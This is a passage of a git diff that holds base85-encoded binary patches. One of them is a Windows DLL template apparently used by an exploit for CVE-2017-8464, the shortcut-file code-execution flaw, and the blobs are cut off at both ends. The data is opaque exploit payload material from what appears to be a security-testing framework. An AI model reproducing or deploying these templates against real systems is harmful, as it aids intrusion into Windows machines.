z{Q@fm-XU<4z$XOm6ZodUlLD=e7?QIE<_jzlxJ+P3V2i*_0^0=sTHvb!j|n^>@H2r^
z|BvXG!1)3tfwu?@3%pNYo4}_9_6dAl;0b}B3Cw=f&~u5v1p<8nR|`z}^)^wyTi_;v
z?E<$6d`4hG;0po|34BYSCU8LDkic}r5Is``W(%Ap@G^l07xr@^9>(Lv@W^<)7=HM3
z@zTVK8-uuimCNNYu9C~^YAPD>!^7A*)Py!5&u(YM;Xsufz*TQG?vg!COPc~=aAcZF
zzlED)VqsU976oKqAh<?e%gZ-XxuWsbK+qe+ZE^#@@nxq?*M$N>A&1xEFG^T(ePdHV
zs=^g`fVBx-WfA-X7wFg}$`xy20`zpJ%D6>e8>kP>EhrCGg__nj$~cd(l0bbx4ity$
z<hp7YChoXDVWmMi5I&R4LZ)lNfq<`Wb+{_L!4s@0y{%48>3NClFOG!6fuJnxWiNk`
z=B;6`jG`K?L1fd?$RAZra%ni+h~Jd?J1Uno)<o(9*VNSquB~bapm!IKP>ueVQlD=o
zs!%EgszUhd8lseMXu__c0(bnLCXzup_G79s)M6lwe|qx>r`1*8THJ_l0*t+#Mp8WW
z^bc5u(!4=<r>Y+J=Vv;^XZ8iE)_sA@R+xRbvadG;u$zq%xsGi%j~Y+*gjpCpx8Rz(
za1%6d8=+iF|BvT6Gylxs4}^J41gitw#6Xy(r!NUKMH&Jr|69_R$o2SmaZM!1KU7py
ztwwZY5Vg1}B;x}|s=HH&=4))cH4;iOW4OZ`aIT~p@p)ruaD816<8ps``4{}Pm1s+Y
zYk34B3aSGk`aS_4BWl==^z!;ZAjF<auLy)2>VhK^fw4X574=ORfMr$nkpSyU|Fc3^
zf4VS)d$AN>Mg~$8IE}ub;Ov>Aa3?V~l)k*GPQIowT#lJpAGmJyH;L`5mgR`=)MP9R
zG&E9QuVt%NVLRCv3?PVEIZAbnt5?;+dyL)2R#i1Lty#sZ*m<T^bqE1;t$}SctwK=T
z%5u|IiI%anRZUn4sv8h>`_ooMg1kOvu3Fs~mf3@5!~um7`@iN|3IMjxT)Upk!3oyf
zAnGniZ>n1ptis;*l5_~;vRss_4+OCbrd*JS73u40Ls)g>TC7oRe?ECimU;YMd>s?}
z<>}!4GNi?&ORg>Tjo6(ByZ;ucp=n)pSWbBZej9)O`+Fd3?03AB!Kv@LZD)MfP1TR%
z|1b|Ej5w$i_=NaA>pbJT?f<Y||L^IJ)A*Nq^S7YOZX?g=Ea%64Iziitw#v5FEp1zN
zY)NeC-Ewrxz!uh?)$V9_w!7Q??Un7J_KoeW?estQvcR9+=4_kahD^dJJKFLL%27jh
zR-3zx4H$Vd*J)z7ie|;X{KsE*{W53UoNZTaTe+=y+r!(Q+IDE$(6$S=U%LI;?cdtI
zY5NP?8U6=Q33#*Gu52r5yT0x2wn<wq-cr1!a?AI({L_|~wtTR~(mtcTw7stVhwW|c
zJKNuA|DZj4t844>t#@vHaI5?<zdHz-_`eW5YirI{)@tPC_BXb&HWQl;*^V};?P!~G
LONeayU-0}JYVLI_

literal 19456
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

diff --git a/data/exploits/cve-2017-8464/template_x86_windows.dll b/data/exploits/cve-2017-8464/template_x86_windows.dll
old mode 100755
new mode 100644
index b95dfe5232b73f48b2773b4add296114d6793b69..eeef7fb413215ccc7b676fda2873ece79e5e1b8b
GIT binary patch
literal 17408
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
